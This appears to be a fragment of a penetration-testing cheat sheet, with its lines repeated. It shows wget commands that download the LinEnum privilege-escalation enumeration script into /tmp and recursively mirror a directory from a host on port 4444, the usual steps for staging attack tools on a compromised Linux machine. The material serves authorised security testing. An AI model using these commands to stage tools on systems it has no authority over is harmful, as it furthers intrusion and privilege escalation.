# Single File Download
wget https://LINK -O /tmp/LinEnum.sh
Recursive WGET
# Recursive Download
wget -e robots=off -r -np -nH --cut-dirs=1 http://1.1.1.1:4444/dir
# Single File Download
wget https://LINK -O /tmp/LinEnum.sh
# Recursive Download
wget -e robots=off -r -np -nH --cut-dirs=1 http://1.1.1.1:4444/dir